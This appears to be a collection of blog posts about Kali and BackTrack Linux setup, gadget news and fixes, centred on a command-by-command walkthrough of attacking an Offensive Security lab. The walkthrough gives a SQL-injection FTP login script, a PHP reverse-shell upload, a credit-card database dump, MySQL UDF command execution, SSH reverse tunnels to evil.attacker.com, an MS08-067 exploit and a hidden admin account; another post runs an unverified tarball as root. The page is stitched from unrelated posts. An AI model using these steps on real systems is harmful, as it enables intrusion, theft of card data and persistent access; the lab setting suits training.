
Kali Linux 1.0.6 was released some time ago, and I am a big fan of Kali Linux, so I wanted to upgrade from version 1.0.5 to 1.0.6. But when I ran

apt-get update
apt-get dist-upgrade

the upgrade was extremely slow. I have a good connection; the problem was that the default Kali HTTP repository server was overloaded.

So what I did was change the apt sources list, from the default:

vi /etc/apt/sources.list

[screenshot 2014-04-05 20:54:40: the original /etc/apt/sources.list]

TO

[screenshot 2014-04-05 20:53:44: the edited /etc/apt/sources.list]

Now execute the following commands and you will see a significant speed improvement !!! Enjoy :)

apt-get update
apt-get dist-upgrade

cheers :J


Sorry everyone for the big delay of 3 months :| I got busy with my exams and so I couldn't give time to you all, but now I have returned to the field, so let's get started….
Well, enjoy this awesome video from Offensive Security:

ftp-brute.py

#!/usr/bin/python
# Walks the ftpuser table one row per login through the SQL injection in the
# FTP username (the LIMIT offset is the row number) and lists each home directory.
from ftplib import FTP

print("Attempting user directory discovery via FTP")
for i in range(0, 6):
    # Injected username: closes the quoted string, kills the real match with
    # 1=2, and UNIONs in row i of ftpuser with its passwd column set to 1.
    username = ("%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser "
                "LIMIT " + str(i) + ",1; -- ")
    password = "1"
    ftp = FTP('www.offseclabs.com')
    ftp.login(username, password)
    print("Logged in as ftpuser row " + str(i))
    ftp.retrlines('LIST')
    ftp.close()

Commands


Open Terminal A :

nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear

ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; -- 
password - 1

(logged in to the ftp server)
pwd
ls
bye

clear

cd core
clear
nano brute.py --> (see ftp-brute.py above)
./brute.py
(one of the rows, the one reached with LIMIT 5,1, has its homedir mapped to the document root of the webserver)
clear

ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; -- 
password - 1

(logged in as the ftpuser row at offset 5, whose homedir is the web root)
ls
put rs.php --> (a PHP reverse shell)

———————–
Open Terminal B :

nc -lvp 80

———————–
Open Terminal C :

wget http://www.offseclabs.com/rs.php

(Then, at Terminal B, we got a reverse shell)

———————–
Go back to Terminal B :
(inside the reverse shell)

/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)

mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt

————————
Open a Firefox :

http://www.offseclabs.com/images/ccdump.txt
(we got the database dump)

————————-
Go back to Terminal A :

(inside the ftp server)
put up.html --> (file upload html form)
put up.php --> (file upload php handler)

————————-
Open Firefox :

http://www.offseclabs.com/up.html

(upload lib_mysqludf_sys.so and mark it as 1)
(upload rs, a binary reverse shell, and mark it as 2)

** Details of lib_mysqludf_sys.so

—————————
Go back to Terminal A :

(quit the ftp server)
bye
clear
exit
(quit Terminal A)

—————————-
Go back to Terminal B :

mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to the MySQL server; the files uploaded through up.html sit in the binfile table of the pwn database)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/bd';
(INTO DUMPFILE needs the FILE privilege and writes as the mysqld user; dropping the UDF into /usr/lib works on this lab's MySQL, newer releases only load SONAME libraries from plugin_dir)

CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';

SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(type this one but don't press Enter yet)

—————————
Open Terminal D :

nc -lvp 80

(go back to Terminal B and press Enter; you will get a reverse shell at Terminal D)

—————————-
Open Terminal E :

nc -lvp 80

—————————-
Go back to Terminal B :

(inside the MySQL server)
SELECT sys_eval(‘/tmp/bd &’);

(press enter and we got another reverse shell at Terminal E)

—————————
Go back to Terminal E :

(inside the reverse shell)
ping -c 1 10.150.0.20
clear

ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(reverse tunnel: port 445 on evil.attacker.com now reaches 10.150.0.20:445 through the compromised server)

—————————–
Open Terminal F :

netstat -antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse

—————————–
Go back to Terminal D :

ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(reverse tunnel: port 4444 on evil.attacker.com now reaches 10.150.0.20:4444)

clear

——————————
Go back to Terminal F :

cd core
nano nx.py --> (an MS08-067 python exploit for Win2k3 SP2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444

(we got a remote shell on 10.150.0.20)
ipconfig
net user hacker hacker /add
net localgroup administrators hacker /add

———————————
Go back to Terminal D :

(quit the tunnel)
exit
clear

ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear

———————————–
Open Terminal G :

netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1

(login to the 10.150.0.20 with username – hacker and password – hacker)

Enjoy :) see ya !!
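
The FTP login injection used above (the username starting with %') ) works because the FTP server looks its users up in MySQL with a query built from the raw username, and then compares the passwd column of whatever row comes back with the password the client sent; the UNION row carries passwd = 1, which is why the password is always "1". The page never shows the server-side query, so the following is an added example, not code from the video or the lab: it assumes a ProFTPD-style lookup of the form SELECT userid, passwd, uid, gid, homedir, shell FROM ftpuser WHERE (userid = '...'), uses an in-memory SQLite table with constructed rows in place of the lab's MySQL ftpuser table (SQLite accepts the same LIMIT offset,count form and -- comments), and puts the parameterised version of the same lookup beside the vulnerable one. SQLite returns UNION rows sorted, so the uids are chosen increasing to keep the offsets deterministic; against MySQL the offset of the web-root user is unknown in advance, which is exactly why the page's script loops over LIMIT i,1.

```python
import sqlite3

# Constructed stand-in for the lab's ftpuser table
# (userid, passwd, uid, gid, homedir, shell). uids increase with row order so
# the LIMIT offsets below are deterministic under SQLite's sorted UNION.
FTPUSERS = [
    ("bob",   "bob",   2001, 2001, "/home/bob",   "/bin/false"),
    ("alice", "alice", 2002, 2002, "/home/alice", "/bin/false"),
    ("carol", "carol", 2003, 2003, "/home/carol", "/bin/false"),
    ("dave",  "dave",  2004, 2004, "/home/dave",  "/bin/false"),
    ("erin",  "erin",  2005, 2005, "/home/erin",  "/bin/false"),
    ("www",   "Xq7!k", 2006, 2006, "/var/www",    "/bin/false"),
]
COLUMNS = "userid, passwd, uid, gid, homedir, shell"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ftpuser (%s)" % COLUMNS)
    conn.executemany("INSERT INTO ftpuser VALUES (?,?,?,?,?,?)", FTPUSERS)
    return conn


def vulnerable_lookup(conn, username):
    # Hypothetical backend query built by concatenation; the parenthesised
    # WHERE is why the payload on the page has to start with %') .
    sql = "SELECT " + COLUMNS + " FROM ftpuser WHERE (userid = '" + username + "')"
    return conn.execute(sql).fetchone()


def safe_lookup(conn, username):
    # Same query, but the username travels as a bound parameter: the quote
    # and the UNION in the payload are just characters of a name that matches nothing.
    sql = "SELECT " + COLUMNS + " FROM ftpuser WHERE (userid = ?)"
    return conn.execute(sql, (username,)).fetchone()


def authenticate(lookup, conn, username, password):
    """Mimics a plaintext-password FTP backend: fetch the row, compare passwd
    as text (a C client sees every column as a string), return the account."""
    row = lookup(conn, username)
    if row is None or str(row[1]) != password:
        return None
    return {"uid": row[2], "gid": row[3], "homedir": row[4]}


def payload(i):
    # Same injected username as the page's ftp-brute.py: the genuine match is
    # killed by 1=2 and the UNION supplies row i of ftpuser with passwd = 1.
    return ("%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser "
            "LIMIT " + str(i) + ",1; -- ")


def discover_homedirs(conn, rows=6):
    """What the LIMIT loop on the page achieves: one homedir per iteration,
    None where the login did not succeed."""
    found = []
    for i in range(rows):
        acct = authenticate(vulnerable_lookup, conn, payload(i), "1")
        found.append(acct["homedir"] if acct else None)
    return found


if __name__ == "__main__":
    db = make_db()
    for i, home in enumerate(discover_homedirs(db)):
        print("row %d -> %s" % (i, home))
    print("parameterised lookup with the payload:",
          authenticate(safe_lookup, db, payload(5), "1"))
```

The fix is the bound parameter in safe_lookup, not filtering the quote character: with the parameterised query the payload is compared as a literal username and the login fails, while real users still authenticate.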

Cuda on Backtrack 5 R2

After some pyrit problems, this is a guide to installing CUDA on BackTrack 5 R2: it covers configuring the CUDA driver and toolkit and running parallel processing.

Start by preparing your kernel sources for the Nvidia driver installation:

root@bt:~# prepare-kernel-sources
root@bt:~# cd /usr/src/linux
root@bt:~# cp -rf include/generated/* include/linux/

Download Nvidia drivers according to your CPU architecture

http://www.nvidia.in/Download/indexsg.aspx?lang=en-in

Make sure you are not in an X session (log out to console), and run the Nvidia driver installer.

Next, download the CUDA toolkit, according to your CPU architecture:

developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_32_ubuntu11.04.run  (32 bit)
developer.download.nvidia.com/compute/cuda/4_1/rel/toolkit/cudatoolkit_4.1.28_linux_64_suse11.2.run  (64 bit)

During the CUDA toolkit installation set the install path to /opt. Now configure your environment so that the nvcc command works, by appending the following lines to /root/.bashrc:

PATH=$PATH:/opt/cuda/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/opt/cuda/lib
export PATH
export LD_LIBRARY_PATH

Then run:

root@bt:~# source /root/.bashrc
root@bt:~# ldconfig

Now check if everything is setup correctly

root@bt:~# which nvcc
/opt/cuda/bin/nvcc
root@bt:~# nvcc -V
nvcc: NVIDIA (R) Cuda compiler driver
Copyright (c) 2005-2011 NVIDIA Corporation
Built on Thu_Jan_12_14:36:13_PST_2012
Cuda compilation tools, release 4.1, V0.2.1221

Now that the Nvidia driver and CUDA toolkit are installed, let's check them with pyrit.

The following command checks out the pyrit source tree with svn:

Code:
svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit

This creates a pyrit directory in the current directory. Next install the libraries and other packages pyrit needs:

Code:
apt-get install libssl-dev
apt-get install scapy
apt-get install python-dev

Build and install pyrit, then its CUDA module:

Code:
cd pyrit/pyrit
python setup.py build
python setup.py install
root@bt:~# cd ../../
root@bt:~# cd pyrit/cpyrit_cuda && python setup.py build && python setup.py install

Run a benchmark to see that everything works as expected:

root@bt:~# pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (63787.8 PMKs/s)... \ 

Computed 63787.82 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce GTX 295: 11558.7 PMKs/s (RTT 3.0)
#2: 'CUDA-Device #2 'GeForce GTX 295: 10912.5 PMKs/s (RTT 2.9)
#3: 'CUDA-Device #3 'GeForce GTX 295: 10632.1 PMKs/s (RTT 3.0)
#4: 'CUDA-Device #4 'GeForce GTX 295: 11654.7 PMKs/s (RTT 2.9)
#5: 'CUDA-Device #5 'GeForce GTX 295: 10868.9 PMKs/s (RTT 2.9)
#6: 'CUDA-Device #6 'GeForce GTX 295: 10322.8 PMKs/s (RTT 3.0)
#7: 'CPU-Core (SSE2)': 500.7 PMKs/s (RTT 2.7)
#8: 'CPU-Core (SSE2)': 508.9 PMKs/s (RTT 2.8)

Tada!! The CUDA GPUs are enabled.

To remove pyrit remove following directories and files

/usr/local/lib/python2.6/dist-packages/cpyrit/*
/usr/local/lib/python2.6/dist-packages/pyrit*
/usr/local/bin/pyrit

I ran the locate command to find these: ~# locate pyrit

If a CPU core seems to be missing from the benchmark output, it is because one core is reserved, so don't worry if one core is missing during the benchmark.
That's all.. see ya!!!

BackTrack 5 R2 has arrived with a brand new 3.2.6 kernel, tons of new and updated tools, and security fixes; BT5 R2 provides a more stable and complete penetration testing environment than ever before. I will post more on upgrading the new tools, but for now here's how to get the new kernel and all of the updated packages:

1. Update and upgrade your BT5 (R1) installation:

apt-get update
apt-get dist-upgrade
apt-get install beef
reboot

Once that's done, you should have the new kernel installed as well as the last updates for the official R2 release. You need to reboot for the 3.2.6 kernel to kick in.

During the upgrade you'll be asked about file revision updates. Make sure to always keep the locally installed file; pressing "Enter" accepts that default.

Note: if X won't start after the upgrade and shows an Nvidia error, follow the procedure below:

Nvidia driver install on BT5r2 Kernel 3.2.6

prepare-kernel-sources
cd /usr/src/linux
cp -rf include/generated/* include/linux/

gedit /etc/modprobe.d/blacklist.conf

and append the following lines:

blacklist vga16fb
blacklist nouveau
blacklist rivafb
blacklist nvidiafb
blacklist rivatv

then save and close the file.

Now, remove old nvidia driver

apt-get --purge remove nvidia-*

reboot

echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf

vi /boot/grub/grub.cfg

insert 'nouveau.modeset=0' just before 'vga=791' (if 'vga=791' appears in two menu entries, insert it in both)

esc :wq!

update-initramfs -u

reboot

Now install the latest Nvidia driver from its site for your architecture:

sh <NVidiafile.run> --kernel-source-path /usr/src/linux-source-3.2.6

or install automatically

add-apt-repository ppa:ubuntu-x-swat/x-updates

apt-get update && apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

reboot

2. OPTIONAL – Once rebooted, log back in, and get your pretty splash screen back.

fix-splash
reboot

On the next reboot, you should see the red console splash screen appear.

3. Verify that you are running a 3.2.6 kernel:

uname -a

You should see something like “Linux bt 3.2.6 …”

4. Feel free to install any or all of the new tools featured in BackTrack 5 R2:

apt-get install pipal findmyhash metasploit joomscan hashcat-gui golismero easy-creds pyrit sqlsus vega libhijack tlssled hash-identifier wol-e dirb reaver wce sslyze magictree nipper-ng rec-studio hotpatch xspy arduino rebind horst watobo patator thc-ssl-dos redfang findmyhash killerbee goofile bt-audit bluelog extundelete se-toolkit casefile sucrack dpscan dnschef

5. Add the new security updates repository to /etc/apt/sources.list, and run another upgrade.

echo "deb http://updates.repository.backtrack-linux.org revolution main microverse non-free testing" >> /etc/apt/sources.list
apt-get update
apt-get dist-upgrade

6. Some of the newly installed services will be set to start on boot. We like disabling these as needed:

/etc/init.d/apache2 stop
/etc/init.d/cups stop
/etc/init.d/winbind stop
update-rc.d -f cups remove
update-rc.d -f apache2 remove
update-rc.d -f winbind remove

And…you’re done!

see ya!!! cheers :)
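
Both the Kali mirror change at the top of this page and step 5 above edit /etc/apt/sources.list by hand, and the echo >> form appends a duplicate every time the step is re-run. As an added example (not part of the original post, and not Kali's or BackTrack's tooling), here is a small Python helper that does the append safely: it checks the entry has the basic "deb URI suite components" shape, refuses the [trusted=yes] option that switches off apt's signature verification for that source, backs the file up, and is idempotent. The existing entry it writes to a scratch file and the example.invalid host are constructed; the BackTrack line is the one from step 5.

```python
import os
import shutil
import tempfile
import time


def add_apt_source(path, line):
    """Append one sources.list entry to `path` if it is not already there.

    Raises ValueError for malformed entries and for entries carrying
    trusted=yes (which would make apt accept an unsigned Release file),
    backs the file up before writing, and returns True only when a line
    was actually added.
    """
    line = " ".join(line.split())           # normalise whitespace
    fields = line.split(" ")
    if len(fields) < 3 or fields[0] not in ("deb", "deb-src"):
        raise ValueError("not a sources.list entry: %r" % line)
    if "trusted=yes" in line.lower():
        raise ValueError("refusing to add a source with signature checks off: %r" % line)
    existing = []
    if os.path.exists(path):
        with open(path) as f:
            existing = [" ".join(l.split()) for l in f]
    if line in existing:
        return False
    if os.path.exists(path):
        shutil.copy2(path, path + ".bak." + time.strftime("%Y%m%d%H%M%S"))
    with open(path, "a") as f:
        f.write(line + "\n")
    return True


def demo():
    """Exercise add_apt_source on a scratch file; returns what happened."""
    workdir = tempfile.mkdtemp()
    path = os.path.join(workdir, "sources.list")
    with open(path, "w") as f:
        f.write("deb http://example.invalid/kali kali main\n")   # constructed existing entry
    line = ("deb http://updates.repository.backtrack-linux.org "
            "revolution main microverse non-free testing")
    first = add_apt_source(path, line)
    second = add_apt_source(path, line)             # no-op: already present
    try:
        add_apt_source(path, "deb [trusted=yes] http://example.invalid/kali kali main")
        rejected = False
    except ValueError:
        rejected = True
    with open(path) as f:
        lines = f.read().splitlines()
    backups = [n for n in os.listdir(workdir) if n.startswith("sources.list.bak.")]
    shutil.rmtree(workdir)
    return {"first": first, "second": second, "rejected": rejected,
            "lines": lines, "backups": len(backups)}


if __name__ == "__main__":
    print(demo())
```

Swapping to a faster mirror, as in the Kali post, does not weaken anything by itself: apt-get update still verifies the mirror's Release file against the keys in its keyring. A mirror that makes apt warn about a missing or bad signature should be dropped, not waved through with trusted=yes.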

Running VLC in BT5

Getting VLC running in BackTrack 5

VLC refuses to start when it is run as root, and on BT5 everything runs as root. Simple instructions to get VLC running in BT5: run the following on the command line
Code:

apt-get install vlc

once that's done run
Code:

hexedit /usr/bin/vlc

then press [Tab] to move the cursor over to the text pane and find where it says:
Code:

geteuid

(it sits right before __libc_start_main in the binary's symbol strings; hexedit shows the NUL byte between them as a dot, which is why the pane reads like "geteuid.__libc_start_main") and overwrite those seven bytes so it reads:
Code:

getppid

Keep the length identical: the names live in the ELF string table, which is referenced by byte offset, so inserting or deleting a byte breaks every symbol after it. VLC's root check calls geteuid() and bails out when it returns 0; after the patch the dynamic linker binds that call to getppid(), which never returns 0 for a process started from a shell, so the check passes. The patched binary no longer matches the package's checksums, so debsums will flag it.

That's it! See ya :)

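The same edit hexedit does by hand, as an added Python script (not from the original post or the VLC project): it refuses to write unless the replacement is exactly as long as the original string and the string occurs exactly once in the file, and it keeps an untouched copy at /usr/bin/vlc.orig. The default symbol names are the ones from the instructions above; run it as root on BT5 with the path to the VLC binary.

```python
import shutil
import sys

# The 7-byte symbol name VLC's root check calls, and its same-length replacement.
OLD_SYM = b"geteuid\x00"
NEW_SYM = b"getppid\x00"


def patch_symbol(data, old=OLD_SYM, new=NEW_SYM):
    """Return `data` with the NUL-terminated symbol name `old` swapped for `new`.

    The name lives in the ELF string table (.dynstr), which other sections
    reference by byte offset, so the replacement must be exactly as long as
    the original; and there must be exactly one match, or the patch would
    hit something it was not aimed at.
    """
    if len(old) != len(new):
        raise ValueError("replacement must keep the string length")
    count = data.count(old)
    if count != 1:
        raise ValueError("expected exactly one occurrence of %r, found %d" % (old, count))
    patched = data.replace(old, new)
    assert len(patched) == len(data)
    return patched


def patch_file(path):
    """Patch `path` in place, keeping an untouched copy at path + '.orig'.
    Returns the number of bytes written."""
    with open(path, "rb") as f:
        data = f.read()
    patched = patch_symbol(data)
    shutil.copy2(path, path + ".orig")
    with open(path, "wb") as f:      # rewrites in place, so the mode bits survive
        f.write(patched)
    return len(patched)


if __name__ == "__main__":
    # Usage: python patch_vlc.py /usr/bin/vlc
    print("wrote %d bytes" % patch_file(sys.argv[1]))
```

If the count check fails on a newer VLC build (no match, or more than one), the layout of the binary differs from the BT5 package and the blind byte swap should not be applied.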
Cool update script in python for adding tools to your BT box..

V.:0.8

  • Rewrote some of the code
  • Added: New Additional Tools menu
  • Added: Install & Register Nessus
  • Moved: BottleFeeding to Additional Tools
  • Moved: Axel & Apt-Fast to Additional Tools
  • Changed: Fix BT5 Bugs to Fix BT5 Bugs/Customize BT5
  • Added: Edit motd in Fix BT5 Bugs/Customize BT5
  • Added: HexorBase to Additional Tools
  • Added: SSLStrip update to Other menu
  • Fixed: Fimap now updates directly from svn

Code:

wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar
tar -xvf bt5up.tar
python bt5up.py

The tarball comes over plain HTTP with no checksum or signature, and bt5up.py runs as root on your box, so read through it before you run it. That's it! See you all!

Swivl

Taking self-portraits or family pictures is hard to manage, but with Swivl you don't have to worry about anything: it is a personal robotic cameraman smart enough to pan and tilt on its own, keeping whoever is holding its electronic marker in the frame.

Perfect for webcam use and self-recording, its electronic marker also has a microphone on board, keeping audio clear no matter where you walk in the room.

Swivl will be available by the end of April for $159.


Here is a masterpiece of miniature mechanical and fluid engineering.

This watch was not shown at CES 2012, but it is so downright weird and cool that it deserves a mention. It's the first of its kind: it uses tiny pistons that drive a bellows, which compresses a glowing green liquid that indicates hours, minutes and seconds.

So there you have it, a miniature pump on your wrist, showing you the time as it flows through tubes. You start the whole thing by winding it up, just like old-fashioned watches. Astonishing.

This crazy geek toy is out of reach at a whopping $45,000.

Many electric cars are coming out this year, and for them Fulton Innovation showed off its wireless charger at CES 2012. One part is buried in the floor of your garage and the other is attached to the underside of an electric car, in this case a Tesla Roadster.

Any drawback? The efficiency of such chargers is lower than that of a wired charger; it is expected to reach 89% by the end of the year.

For reference: eCoupled, for more wireless charging products and dealer info.

The Fisker Karma hybrid electric car is just getting into production, and its makers are taking the car on a U.S. tour to show it off. The car's design is inspired by the cheetah, and it has much better solar charging performance than the Toyota Prius. It accelerates from 0-60 mph in 6.3 s and has a range of 50 miles in electric mode and 300 miles in hybrid mode. The super luxurious interior and sporty exterior of the Fisker Karma are certainly not cheap, with prices starting at $100,000.

In this post I will explain how to fix the "waiting for sound system to respond" error on BackTrack 5 Revolution. It happens because we always log in to BackTrack as root, for which the PulseAudio daemon is not started automatically, so the sound volume cannot be changed. If you have the same problem, follow the steps below:

1. Go to System -> Preferences -> Startup Applications.

Make sure that you are on the "Startup Programs" tab, then click "Add".

2. A small window appears; fill it in as follows:

Name: Pulseaudio daemon

Command: /usr/bin/pulseaudio

Comment: Start the sound daemon.

3. Restart your computer or laptop.

cheers enjoy !!!
